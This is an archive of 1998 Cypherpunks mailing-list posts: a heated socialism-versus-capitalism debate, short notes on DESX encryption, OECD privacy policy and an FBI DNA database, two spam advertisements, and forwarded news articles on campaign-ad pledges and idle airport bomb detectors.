 the type of legislation Keisling advocates if it is
 proposed again during the 1999 Legislature.

 In the meantime, candidates are free to be as vicious
 as they want. Aware of just how nasty this campaign
 season could become, several groups are pushing
 voluntary codes of conduct to stop the underhanded
 advertising before it starts.

 About 50 candidates signed Keislings Stand By Your
 Ad pledge, which requires them to include their name
 and address on all political advertising and to take
 responsibility for any criticism of their opponents. That
 means using their pictures in written material, narrating
 a radio ad and appearing on-screen in a TV
 commercial if it involves a comparison of candidates.

 Many candidates also signed the League of Women
 Voters code of conduct, which was adopted by the
 Oregon Alliance for Better Campaigns. The alliance,
 which is not counting the number of signers or keeping
 track of how candidates who took the pledge behave,
 is asking candidates to keep campaigns clean. The
 alliance also is coordinating issue-oriented, analytical
 political coverage on TV and radio stations across the
 state.

 "Its no more complicated than one of the things my
 mom told me growing up, Keisling said of his pledge.
 If youre going to say something bad about somebody,
 say it to their face.

 But nobody will be reprimanding candidates who
 violate the pledges or choose not to sign them. And
 for some candidates, sticking with the pledge will
 mean not responding to jabs at their character,
 credibility or public record.

 In mid-September, voters received a mailing with the
 headline, What was Terry thinking? In a large-print
 checklist, the ad compares Thompson with
 Republican Alan Brown, his opponent in House
 District 4.

 "Supports returning the income tax kicker refund
 shows a no for Thompson and a yes for Brown. So
 does the campaigns are bankrolled by big labor
 unions category. Thompson said many of the
 footnotes supporting these criticisms were based on
 one detail of a large bill or on bills that never came to
 a vote.

 Amid these sweeping accusations, Brown did not
 include a statement that his campaign had paid for the
 flier. Several years ago, the ad would have violated
 Oregon law.

 Henri Schauffler, Deckerts Republican opponent, said
 he would change one thing about his September fliers
 if he had it to do over again: Hed include the
 sponsorship. But he would keep the derogatory
 rundown of his opponents record, which included
 claims that Deckert believes voting against small
 business 57 percent of the time is acceptable and
 supports spending 2 percent kicker tax refunds to
 fund state government programs.

 Schauffler, who signed Keislings pledge, said he did
 not design the anonymous ads and regrets allowing
 them to be distributed.

 "Against my better judgment, I went ahead with the
 ads, Schauffler said. Im ultimately responsible, and I
 take responsibility for that mistake. Its not going to
 happen again from my camp.

 Deckert said he received more than 100 calls, e-mail
 messages and letters of support from voters who had
 seen the attack ads against him.

 Victims of negative ads face enormous pressure to
 retaliate, candidates said. In past elections, party
 workers have even suggested that Thompson hire a
 detective to spy on his opponent, he said.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 12 Oct 1998 14:23:49 +0800
To: cypherpunks@cyberpass.net
Subject: Re: NT 5.0 and EFS -- A victory for widespread use of crypto?
In-Reply-To: <361BF3ED.8111C033@bitstream.net>
Message-ID: <3621A939.4D2E7FC1@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



> On Wed, Oct 07, 1998 at 06:06:21PM -0500, Steve Dunlop wrote:
> 
> So what's DESX?

DESX is DES with 'whitening' of input and output. See B. Schneier,
Applied Cryptography, 2nd ed., p.295.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martinus Luther" <martinusl@hotmail.com>
Date: Mon, 12 Oct 1998 23:48:19 +0800
To: cypherpunks@cyberpass.net
Subject: Two Jims, Werner and Matt redefine socialism for their own ends
Message-ID: <19981012150355.2145.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



I never replied to any of the threads about about monopolies and freedom 
and government intervention because it was all so off-topic. But 
*really*. Saying Rosa Luxemburg wasn't a communist is like, totally off 
the wall: 

Werner Koch wrote:


> "Die Freiheit des Einzelnen endet dort,
>  wo sie die Freiheit der Anderen einschrnkt."
>  Rosa Luxemburg
>  The freedom of an individual ends, as it (the freedom)
>  limits the freedom of the others.
> [This was one of the former Eastern Germany liberty 
> movements' slogans  -  and not a communists one]

She was a founder-bloody-member  of the German Communist party! 

A 100% died-in the wool far-left feminist socialist and CP member. Just 
because the state capitalists of the old Soviet Union subverted what 
remained of the German left and turned it into an instrument of foreign 
domination and repression doesn't mean that Rosa wasn't a real 
communist, or a real socialist. It was the apparatchiks and the 
beauraucrats who stole the name, not her. The US equivalent at the time 
might be  Eugene Debs (or even Joe Hill - a prophet better honoured 
outside his own country - although he would probably be happier to be 
associated with anarchists than communists). 

Oh look, you've got me started.

Jim Choate wrote "Another potential flaw in current economic theory" and 
more or less gave a definition of centrist, liberal socialism as it 
applies to business. The sort of "3rd way"  views that the right-wing 
Labour government in UK might have had when they were out of office 
(being elected moved them even further to the right & the word 
"socialism" hardly applies any more).  As Jim pointed out  the practice 
of giving all the gain to the owners inevitably alienates the workers.

But when Jim Burnes  - much more naive poltically - said it was 
"socialist", Jim C. vehemently denied it! It seems that the *word* 
Socialist for you guys has become an insult, without substantive 
meaning, it isn't actually a label for socialism any more, when you want 
to talk about real socialism you have to find new words.  Just like your 
bloodthirsty government made the word "communist" an insult in the 1940s 
and 50s - for McCarthy and Hoover and their  friends "communist" didn't 
mean "communist" it meant "a person we don't like and intend to 
persecute".  Which is maybe why Werner had to say Rosa wasn't a 
"communist". He had taken on board the US definition of "communist" as 
insulting and was no longer able to use the word about someone of whom  
he approved.

And them Jim went and ruined all by writing:

> Socialism is the belief that property is best managed and owned by
> the government. 

Well, some people who have called themselves socialists have believed 
that. It was especially popular at the turn of the century. But many of 
us never believed that and almost none of us do now.

> Fascism is the belief that property should be owned by private
> individuals but managed by governments.

No, not really. Fascism is a belief in the organic reality of the nation 
and in the priority of the nation's interests over the individuals. 
Fascism tends to glorify the army (socialists are usually suspicious of 
it) to ally with traditionalist elements in society (such as the 
aristocracy or the Roman church), to be racist and narrowly nationalist 
(Socialists are more likely to be into diversity, "rainbow coalitions" 
and to be internationalist, at lest in their rhetoric) and to be 
strongly authoritarian, especially about personal behaviour. 

> Capitalism is the belief that property should be owned and managed by 
the individual.

In which case why is so much property owned and managed by companies? 
Why does our capitialist system result in so many working for others, 
rather than themselves?  "Sargeant, where's mine?". Capitalism is a 
society where, overwhelmingly, property is owned and managed by 
*someone* *else*, usually some corporate body or faceless beauracracy. 
Whether that *someone* *else* is a limited company as it almost always 
is in the US, or a branch of government as it almost always was in the 
state-capitalist Soviet Union makes little difference.

In fact, given the choice, and living in a representative democracy, I 
prefer the government-run business to the corporation-run one, 
especially if it is local government, because at least I have the vote.  
The two largest employers round where I live are a multinational bank 
and local government. I can vote for my councillors. Some of them I my 
neighbours.   I can even meet them and have a beer with them. They might 
not do what I want but at least they have to pretend to listen.   I'll 
never meet the CEO of that bank, or members of the board. They live in a 
different country from me. They have corporate jets and chauffer-driven 
cars and holiday on private islands. I'd probably have to be a 
millionaire to drink in the same bars as them.  I dislike State control 
of business but it isn't half as bad as the faceless beauracracies of 
the banks, the phone companies, the big drug companies and so on.

If there *was* a society where all property was owned and operated 
managed by individuals working for themselves it would be something like 
Belloc and Chesterton's "distributivism".  The Biblical hope of "each 
man under his own vine and his own fig tree" or the 17th century English 
dream of "3 acres and a cow".  Nearer to socialist anarchism than to 
anything else  -  nothing to do with capitalism at all. 

How many of you have a mortgate or pay rent? Capitalism means that 
someone else owns your house. How many of you work for a corporation? 
Capitalism means that someone else owns your job. Don't believe the 
bullshit about "private ownership". Capitalism means that someone else 
gets to own everything, the rest of us just get to work for them.

But then Jim B. restored my faith in Jim C. my making the most childish 
statement yet:

> You imply that the employees and employers interests are not the same. 

It is so pathetically obvious that they are *not* the same that it's 
hard to answer this without farting.   Both employee and shareholder 
have an interest in paying for investment - the employee to keep the 
business going, and keep their job, the investor to raise the capital 
value.  But after investment there is a pot of money to be split (or 
should be, if the company is viable).   If it goes to shareholders in 
dividends, it doesn't go to workers in wages. If it goes to workers, it 
doesn't go to shareholders. A conflict of interest. Shareholders and 
managers have an interest in getting more work out of an employee for 
the same wages - whether by longer hours, or by automation or by  
training. A worker doesn't have that interest unless the extra 
production is returned to them in wages. Which it usually isn't, else 
where would profits come from?

You Americans  think you can defuse socialism by defining it as "state 
control of industry"  (an idea which most of the left has rejected for 
40 or 50 years now and a great many never accepted in the first place)  
and then accuse people of playing with definitions to make a point!

Read : http://www.web.net/~newsoc/documents/Draper.html which says all 
this at greater length than I've got time for. 

It kicks off with a great quote from William Morris:

"... I pondered all these things, and how men fight and lose the battle, 
and the thing that they fought for comes about in spite of their defeat, 
and when it comes turns out not to be what they meant, and other men 
have to fight for what they meant under another name..." 

You Yankee conservatives and your so-called libertarian (but, in 
practice, always almost authoritarian) friends may think you can get rid 
of socialism by defining it out of existence but it will rise again, 
even if it has to be under another name.

And then Matt Gering replied to Ken Brown:

>> A monopolisitic supplier of some good has a measure 
>> of political power.

> Political power gums at the mean end of a gun, what political power do
> monopolies have and how?

And I was almost knocked over by the innocence, ignorance and naievety 
of such a statement. What political power do monopolies have?  The power 
to deny you things you need to live. The power to deny you the means to 
earn a living.  Political and economic power go hand in hand, as they 
always have. You can never have one without the other.

If there is only one employer in a town then anyone born there must 
either leave or knuckle under.  Remember "I sold my soul to the company 
stores".

And what's this crap about the shareholders bearing the risk and the 
workers not? Is giving years of your life to some enterprise that then 
gets sold from under your feet and closed down not a risk? Is going donw 
a mine, not a risk, or to sea, or standing in front of a class of 
screaming kids, or working the late night shift in a burger bar, or 
driving a tractor, or cleaning the streets? You don't have to have any 
romantic workerist notions about the dignity of labour to realise that 
workers have a risk, and an interest.  

It two take similar jobs with different companies, both work for years, 
getting promoted, putting aside a pension, and one is suddenly made 
redundant, "let go", because the incompetance or whim of the bosses has 
ruined the company, hasn't that person lost something? Haven't they made 
an investment of their time, their thought, their life?  Even an office 
worker, a beauraucrat, a clerk even a computer programmer (gasp!) brings 
their chips to put on the table.

As GK Chesterton said it isn't the rich who have the greatest interest 
in society. They can always get on the next boat to Borneo. It is the 
ordinary folk who have to stay behind and clean up the mess the rich 
leave behind them.

Unlike what Matt Gering said monopoly power *does* "come out of the 
barrel of a gun" - it is preserved by  military and police authority. 
The forms of "ownership" under which most  big businesses operate - 
things like the joint stock company, or limited liability  - are not 
natural, they do not arise out of common human attributes (if they did 
they would be universal, whereas they didn't appear until they were 
invented in Holland or England less than 500 years ago). They are 
defined and controlled by the political process. 

Just like previous forms of ownership. The feudal system was not 
"natural", slavery is not "natural", the monastic ownership of huge 
tracts of land was not "natural", the king's right to appropriate land 
from intestate barons and minor heiresses was not "natural". The 
politics of the time - as always more or less run (but not entirely  
public opinion and tradition count for somethign even in a dictatorship 
or absolute monarchy) by the rich and the well-armed; but as always, in 
a state of tension between and various interest groups - the politics of 
the time defined what counted as ownership and backed it up with fire 
and the sword.  A peasant could take his master to court and claim to be 
free (the longest court case in English history was the inhabitants of a 
village in Oxfordshire suing their lord for their freedom) but if the 
peasant tried to farm the lord's land - well what are men-at-arms for?

And that's the same now. Great property, the ownership of land or 
shares, the ownership of the products of other people's work, to be 
disposed of at will as if it was  a comb or a pen, is a social 
construction. Like money itself it exists because folk choose to believe 
that it exists. If we all stopped behaving as if great property existed, 
it would cease to exist. It is somethign that is in our minds, not 
nature. If shopkeepers lose respect for your dollar bills or your credit 
cards or your gold bars (other than as a useful and beautiful metal) you 
will not be able spend your wealth. That respect for money is buttressed 
by the state.  

If farmworkers lose their respect for the land rights of the owner and 
start planting crops in their own right, then the owner will no longer 
own - unless they can get the state, the police, the army, to help them.  
At this point so-called libertarians interject & say that the 
libertarian owner will defend his property with his own gun - but one 
man can't fight off 20 or 30 - they have to get their friends and 
neighbours to join in, or hire guards - and that's back to politics 
again. It may not be a "state" (although that's a matter of definition)  
but when people band together to defend what they see as their property 
it is certainly politics. That's what politics is, how people live 
together in numbers. The gunwankers may fancy themselves libertarians 
but really all they are pleading for is the right for them and their 
friends - their guards, their police - to oppress the workers. US 
so-called liberatarianism, hand in hand with the most blatant forms of 
capitalism, the instutionalised rascism of US society and the gunwanking 
fantasies of the pampered hooligans who call themselves "libertarians" 
would inevitably lead not to freedom from the State but to the 
imposition of hundreds or thousands of mini-States, each as brutal as 
the next.  You would be better off in Albania or Burundi. 

Most assets in our society are owned by corporations, not by natural 
persons. They are socially and legally defined. The law - backed by the 
State, the police, the army and the courts - grants limited liability to 
shareholders. That might even be a good idea, it encourages investment 
and reduces the number of destitute capitalists begging on street 
corners. But it isn't at all the same thing as natural, ordianary 
property rights, and it is 100% political power and not far from Mao's 
gun barrel.

Sometimes I have to remember that I am dealing with Americans here. You 
are all, well, most of you, hopelessly naive about politics, caught up 
in your little local squabbles. You are taking the mote out of you rleft 
eye and ignoring the beam in your own right eye.  How can anyone take 
eriously a country that makes more fuss about where Clinton put his 
cigar than it  did about Oliver North's terror squads buying weapons for 
mass-murder in Nicaragua with profits made form selling cocaine in the 
USA? And if Reagan *didn't* know then he should have been removed from 
office as medically unfit. And we *know* Bush knew. And the fucking 
Republicans voted him in afterwards. 

It's always the same with conservatives - they make libertarian noises  
but when push comes to shove they turn out to be the same old 
authoritarian ruling class who have been kicking us around for 
centuries. It's almost as bad in England. The Tory Party actually has 
*two* right wings: the big-business-friendly free traders (who tend to 
dominate when they are in power) and the blue-rinse backwoodsmen who are 
in to Queen and Country and tend to come to the fore when in opposition. 
The first sort would be Libertarians if they weren't Tories. The second 
sort would be fascists. They are the reason 17 years of Tory government 
made no real contribution to civil liberties in Britain. Whenever the 
Tories are scared of losing power they put away their free-trade and 
libertarian principles and out coem the bigots, the racists, the petty 
nationalists, the hounds baying for blood. Evil shits the lot of them.

Eugene Debs is supposed to have said: "Too long have the workers of the 
world waited for some Moses to lead them out of bondage. He has not 
come; he never will come. I would not lead you out if I could; for if 
you could be led out, you could be led back again. I would have you make 
up your minds that there is nothing you cannot do for yourselves."

That's authentic socialism. 

No leader will save us - if we have leaders we don't have freedom. No 
elite of gun-toting so-called libertarians will make the works a better 
place - thay are part of the problem, not part of the solution. No 
cypherpunk who thinks that the rest of us are worthless sheeple will 
ever get anywhere. People have to do it for themselves, together.

It is a fallen world. All have sinned and fallen short of the glory of 
God. No man is more fitted than any other to rule. All political power 
will lead to corruption, and all economic power is political power. To 
be rich is inevitably to be corrupted, not because the rich are greater 
sinners than the poor but because the rich have more power than the 
poor, and all are sinners and all will abuse power.  We try to use 
democracy and the vote to protect ourselves against the abuse of 
political power by those who think they know better than us. We need to 
protect ourselves  against the abuse of economic power in the same way.


John the Ranter

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Mon, 12 Oct 1998 23:44:30 +0800
To: mok-kong.shen@stud.uni-muenchen.de
Subject: Re: IP: Different Approaches to Privacy Issue: OECD
In-Reply-To: <3621BBDC.F59EA4AB@stud.uni-muenchen.de>
Message-ID: <199810121509.IAA00564@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Mok-Kong Shen writes:
> 
> Vladimir Z. Nuri wrote:
> > 
> 
> > 09 October 1998
> > 
> > OECD CONFERENCE ACCEPTS DIFFERENT APPROACHES TO
> > PRIVACY ISSUE
>  
> > Ottawa -- A conference of 29 industrialized countries for promoting
> > electronic commerce has resolved a controversy between the United
> > States and the European over Internet privacy by accepting both points
> > of view.
> > 
> > The United States contended industry should be left to manage the
> > problem by itself, but the European Union had demanded a government
> > regulatory approach.
> 
> This 'sounds' like the US is opposed to having any crypto regulations!??


No, the US is opposed to any privacy regulations.  "electronic commerce"
now means so many things that you have to consider it to be a comment
phrase that adds no meaning to the sentence in which it resides.


-- 
Eric Murray          N*Able Technologies                    www.nabletech.com
(email:  ericm  at the sites lne.com or nabletech.com)     PGP keyid:E03F65E5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 13 Oct 1998 00:47:04 +0800
To: cypherpunks@cyberpass.net
Subject: FBI to inaugurate national DNA database
Message-ID: <36222B37.1F29FA01@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



SJMC retails a report from today's NYT:

http://www.sjmercury.com/breaking/docs/084314.htm

Executive summary:

- Computer at secret location
- Access limited to LE
- All sex offenders get to contribute; felons in some States;
  other contributors not yet determined. 

-- 
	Jim Gillogly
	Highday, 21 Winterfilth S.R. 1998, 16:12
	12.19.5.10.14, 5 Ix 7 Yax, Seventh Lord of Night




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 12 Oct 1998 15:43:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Different Approaches to Privacy Issue: OECD
In-Reply-To: <199810110537.WAA18794@netcom13.netcom.com>
Message-ID: <3621BBDC.F59EA4AB@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Z. Nuri wrote:
> 

> 09 October 1998
> 
> OECD CONFERENCE ACCEPTS DIFFERENT APPROACHES TO
> PRIVACY ISSUE
 
> Ottawa -- A conference of 29 industrialized countries for promoting
> electronic commerce has resolved a controversy between the United
> States and the European over Internet privacy by accepting both points
> of view.
> 
> The United States contended industry should be left to manage the
> problem by itself, but the European Union had demanded a government
> regulatory approach.

This 'sounds' like the US is opposed to having any crypto regulations!??

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trends@lcrt.com
Date: Mon, 12 Oct 1998 17:00:18 +0800
To: <cypherpunks-unedited@toad.com>
Subject: 5,000 URL Search Engine Submissions - $99 !!! *AD*
Message-ID: <199810120829.BAA27132@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



============================================================
Remove instructions can be found at the bottom of this page.
============================================================

Effective web site promotion is an essential part of just about any 
successful Internet marketing program. Search engine submission is the most 
effective and inexpensive way to advertise your web site on the Internet. 
FTWI will submit your web site URL to 450+ search engines and directories 
once a month for an entire year. This includes all the major search engines 
and directories. Most other submission services you find on the Internet just 
submit your site URL one time at a much higher cost. We are submitting your 
site 12 different times. THAT IS OVER 5,000 URL SUBMISSIONS FOR $99! But 
that's not all!

The fact: search engine submission is worthless if your site isn't search 
engine ready. In addition to this comprehensive submission service, a FTWI 
web design/marketing specialist will inspect the design of your web site and 
give you a detailed report of his findings and suggestions to help get you a 
higher placement in the search engines and directories.  Keyword rich meta 
tags are essential to get your site a high placement in most of the major 
search engines. FTWI will create custom meta tags if your site needs them at 
no extra cost. You will also get feedback on any content or HTML additions 
that might prove beneficial to search engine placement. This service alone is 
worth much more then $99! Most of those other companies don't even know what 
your web pages look like and charge you twice the price!

Once you sign up to promote your site you will be entitled to the following 
special web promotion services. 

Web Page Design: $35.00 hr  ($10 off regular rate)
Submit 2nd URL: $75.00 ($24 off regular price)
Site Inspections: FREE!
Meta Tag Generation: FREE!
Web Promotion Weekly Tips & Tricks: FREE!

Start a traffic jam at your site by taking advantage of this amazing offer!

To order by mail please print and complete the form below. 
For online credit card orders reply to this email with "Order" as the subject 
or send to ftwi@lcrt.com  
You will receive a message with a URL leading you to our secure server for 
online transactions.

Thanks,

FTWI Internet Marketing
ftwi@lcrt.com

----------------------------------------------------------

FTWI Web Site Submission Order Form

Complete this order form and send it with your check or money order for $99 
made payable to: FTWI


Name: _________________________________________________
Address: ______________________________________________
City: _____________________State: _____Zip: ___________
Phone number:_________________Date: ___/___/___
Valid Email Address: _______________________________ 
Web site to submit: http://____________________________

Returned checks are subject to $25 NSF Fee. You will receive an email receipt 
as soon as we receive your payment. Service will start immediately.


Send your order and payment to: 
FTWI. 
4019 Goldfinch, Ste. J
San Diego, CA 92103 


------------------------------------------------------------
This message complies with the proposed United States 
Federal requirements for commercial e-mail bill, Section 301.

For additional info see: 
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html

Sender Information:

FTWI
4019 Goldfinch St, Ste. J
San Diego, CA 92103 
6194910215 

Per Section 301, Paragraph (a)(2)(C) of S. 1618, further 
transmissions to you by the sender of this e-mail may be 
stopped at NO COST to you by sending a reply to 
trends@lcrt.com with the word "remove" in the
subject line. 
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 12 Oct 1998 16:27:15 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199810120806.KAA24593@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Monday, October 12, 1998 - 10:00:42 MET <--Suspicious Central European Time Zone

>>  >> From another one of the several lists I'm on, I figured someone
>>  > might know who the new pseudo-proud owner of a fully-operational
>>  > SS-1C Scud missle *WITH* moblie launcher is...
...
>Besides, my interest is not in that obsolete SCUD, but in the 8
>shoulder-fired missiles brought in at Cosco's port the week before.

Hey, there's a SALE on MISSILES at COSTCO!!!


~~~~~
No, not _that_ China Overseas Shipping Company....
the one that merged with Price Club!

        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Tue, 13 Oct 1998 02:39:39 +0800
To: Martinus Luther <martinusl@hotmail.com>
Subject: Re: Two Jims, Werner and Matt redefine socialism for their own ends
In-Reply-To: <19981012150355.2145.qmail@hotmail.com>
Message-ID: <Pine.LNX.3.96.981012113504.431B-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 12 Oct 1998, Martinus Luther wrote:

> I never replied to any of the threads about about monopolies and freedom 
> and government intervention because it was all so off-topic. But 
> *really*. Saying Rosa Luxemburg wasn't a communist is like, totally off 
> the wall: 
> 
> 
> But when Jim Burnes  - much more naive poltically - said it was 

Ahh!  It begins -- typical socialist argumentation.  When you run out of
rational ideas, begin ad hominem attacks (I think I counted at least
five).  I don't have time to rebut this now.  I must report my hours
that I slaved away under last week (damn corporation -- controlling my
life -- i'm being opressed).

I'll take it up later this afternoon. 


jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: distributor@angelfire.com
Date: Tue, 13 Oct 1998 03:01:14 +0800
To: cypherpunks@cyberpass.net
Subject: Seeking Commission Based Sales Representatives and Distributors
Message-ID: <199810121841.LAA03234@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



We are seeking commission-based sales representatives and distributors
in your geographic market to spearhead the national roll-out for our 
Consumer Smart Product line. 

Whether you are a student or a senior citizen,
everyone is qualified to earn extra income within our company. 

	Could you use extra income?
       	Are you tired of get rich schemes?

If you can answer YES to these questions, then this is the perfect 
opportunity for you.

	This is not a pyramid or get rich quick scheme.
       	This is a serious, legitmate business opportunity.

We offer Consumer Smart Products at prices everyone can afford!  
Our products are useful for everyone and they make perfect gifts! 

All our products emphasize "Quality, Function and Value" 

For additional information, please reply to this email with more info 
in your subject heading. Only serious applicants need apply.

Thank You







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xena - Warrior Princess <xena@best.com>
Date: Tue, 13 Oct 1998 04:54:37 +0800
To: cypherpunks@toad.com
Subject: DNA
Message-ID: <Pine.BSF.4.02A.9810121317430.21444-100000@shell16.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain





Another example of science fiction that probably should have been kept as
fiction.


FBI to inaugurate national DNA database

NEW YORK (Reuters) - The FBI will open a new and improved
national DNA database Tuesday that will be used to help
stop serial rapists and other repeat criminals, the New
York Times reported Monday. 

(Full story)
http://www.sjmercury.com/breaking/docs/084314.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 13 Oct 1998 05:54:21 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Two Jims, Werner and Matt redefine socialism for their own ends
Message-ID: <33CCFE438B9DD01192E800A024C84A193A7A47@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> The two largest employers round where I live are a 
> multinational bank and local government. I can vote 
> for my councillors. Some of them I my  neighbours.

So why can't your neighbors run a bank?

> something like Belloc and Chesterton's "distributivism".

Distribute what and created by whom? Need I point out the obvious
fallacy that wealth is a static sum. It is not, wealth must be *created*
before it exists to plunder and share. Abstract wealth and divorce it
from the creator and you eliminate the motive to create. You can only
live from plundered wealth so long before you slip into oblivion (see
the Soviet Union).

> How many of you have a mortgate or pay rent? Capitalism 
> means that someone else owns your house.

No, capitalism allows you to leverage your future productive capacity to
acquire capital assets you wouldn't otherwise have. That is your choice,
and your benefit.

> How many of you work for a corporation? Capitalism means 
> that someone else owns your job.

No, capitalism allows you to trade your labor instead of your product.
That is your choice, and your benefit.

> And then Matt Gering replied to Ken Brown:
> 
> >> A monopolisitic supplier of some good has a measure 
> >> of political power.
> 
> > Political power comes at the mean end of a gun, what 
> > political power do monopolies have and how?

> And I was almost knocked over by the innocence, ignorance and 
> naievety of such a statement.

The question was not rhetorical. Do you care to answer?

> What political power do monopolies have? The power 
> to deny you things you need to live.

How? By denying the ability of others to supply them. By denying your
right to create them. By (legitimately) denying your ability to steal
them. 

> The power to deny you the means to earn a living.

How? By denying your ability to create and dispose of your own wealth.
By denying you the right to freely trade your labor or the right of
others to purchase that labor. By denying your ability to accumulate
capital.

> If there is only one employer in a town then anyone born 
> there must either leave or knuckle under.

Staying is a restraint that is self-imposed (provided government does
not restrict freedom of movement). Why is there only one employer?

> Unlike what Matt Gering said monopoly power *does* "come 
> out of the barrel of a gun" 

On the contrary I clearly stated it did. But if the monopoly does not
have guns itself, whose guns are they?

> - it is preserved by  military and police authority.

Exactly. So eliminate those guns.

> Like money itself it exists because folk choose to believe 
> that it exists. If we all stopped behaving as if great 
> property existed, it would cease to exist.

"Reality is that which, when you stop believing in it, doesn't 
 go away." -- Philip K. Dick

Fine, stop believing in money, no one is forcing you to. Did it work?
Oh, you mean *everyone* has to stop believing in it? Sounds like mass
delusion to me, and metaphysical subjectivism. The fact that something
exists or not is clearly independent of whether anyone believes in it or
not.

Money is a symbol. The valuation of any given monetary system is
entirely irrelevant to the existence of that which money represents, and
the failure of Fiat currencies does not abolish the existence of what
they had represented.

What is the root of money?
http://www.ecosystems.net/mgering/money.html

> That respect for money is buttressed by the state.

Manipulation of the money supply by the state is tool for theft by the
state and denial of economic reality. It had consequences in 1929, and
it will again.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 13 Oct 1998 06:52:50 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Tracking: Machines to Check Airline Bags Mostly Idle, Report Says
Message-ID: <199810122228.PAA05971@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Tracking: Machines to Check Airline Bags Mostly Idle, Report Says
Date: Sun, 11 Oct 1998 08:03:44 -0500
To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/yr/mo/day/news/washpol/unused-bomb-detectors.html

October 11, 1998

Machines to Check Airline Bags Mostly Idle, Report Says

By MATTHEW L. WALD

WASHINGTON -- The Federal Aviation Administration has spent
more than $122 million on machines to detect bombs in checked
baggage, but those machines that have been installed sit idle for most of
the day, according to investigators from the Department of
Transportation. 

The machines, which cost $1.3 million each to buy and install, are
supposed to be capable of handling 225 bags an hour, but of 13 that
were audited by investigators, nine handled fewer than 200 bags a day,
according to a report released on Friday. 

Some got so little use that the operators could not maintain proficiency in
running them, investigators said. 

"At some airports, they're sitting relatively unused," Lawrence Weintrob,
an assistant inspector general of the Transportation Department, said in a
telephone interview. "Some airports that are using them are using them
rarely, or process relatively few bags through them." 

But Cathal Flynn, assistant administrator of the FAA for civil aviation
security, said the average number of bags processed through each
machine was rising sharply as airlines gained experience. Flynn and airline
representatives said that part of the problem was that the computerized
system for choosing which passengers' bags get scanned was still
developing, and would not be fully implemented until the end of the year. 

"We haven't ironed out all the kinks in the process," said Susan Rork,
managing director of security at the Air Transport Association, the trade
group of the major airlines. 

The computerized system singles out individuals about whom there is too
little information to conclude that they are not a threat, officials say. It
also draws a sample from the group judged not to be a threat, to increase
the chance that a terrorist would be caught, and to make the system
fairer, Flynn said. 

One problem, he said, is that if the system were changed to require that a
larger number of passengers have their bags scrutinized, then at peak
periods people would be delayed so long they would miss their flights. 

"If you get people fuming at a line, that's not good either," Flynn said.
That, he said, would probably discourage machine operators from doing
their jobs right. And delays, he said, would damage public acceptance of
security measures. 

In written comments responding to the report, the FAA said that the
agency would "pursue a more coherent strategy with air carriers to
ramp-up to a higher level of use." However, the agency said, it would be
"many years" before technology allowed screening of all bags. 

Auditors also said that the machines in use could handle only about half
as many bags as they did in lab tests, partly because they sound false
alarms far more when in use at airports. Each false alarm requires time to
resolve. (All alarms so far have been false, officials said, because no
bombs have been detected.) 

The machines' higher false alarm rate is "probably a reason why they
don't use it as often as they should," Weintrob said. 

Fifty-nine of the machines have been installed so far; plans are to have 74
in place by the end of the year, he said. 

Officials of airports where the machines are installed declined to
comment and asked not to be identified. Under FAA rules, airport
operators are responsible for various aspects of security, but not for
screening bags. That responsibility falls to the airlines. 

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
